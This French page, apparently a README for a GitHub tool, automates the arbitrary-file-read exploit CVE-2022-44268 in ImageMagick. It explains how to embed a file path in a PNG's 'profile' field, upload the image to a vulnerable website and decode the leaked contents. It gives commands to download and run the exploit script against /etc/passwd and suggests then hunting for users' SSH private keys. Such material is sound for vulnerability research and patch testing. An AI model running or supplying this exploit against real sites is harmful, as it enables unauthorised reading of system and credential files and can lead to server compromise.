
Automatisation de l'exploitation de la lecture arbitraire de fichiers d'ImageMagick (CVE-2022-44268)

Automatisation de l'exploitation de CVE-2022-44268 ImageMagick Arbitrary File Read
Découverte originale : https://www.metabaseq.com/imagemagick-zero-days/
Dépôt du PoC : https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick va interpréter la chaîne de caractères « profile » comme un nom de fichier et chargera le contenu en tant que profil brut, puis l'attaquant peut télécharger l'image redimensionnée qui contiendra le contenu d'un fichier distant.
🔴 Prenez un fichier PNG, ajoutez un chemin de fichier dans le champ EXIF « profile », envoyez-le à un site Web utilisant une version affectée d'ImageMagick, celui-ci interprète le chemin de fichier, charge son contenu dans le champ EXIF, vous téléchargez l'image, extrayez les données HEX du champ « Raw Profile Type », puis convertissez-les en ASCII pour lire le fichier distant.
Versions affectées : ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -y
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <nom de l'image> <fichier à lire>
./auto-cve-2022-44268.sh flag.png /etc/passwd
Une fois que vous avez obtenu les utilisateurs depuis /etc/passwd, essayez d'énumérer les clés privées SSH depuis /home/.ssh// :
N'oubliez pas :
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268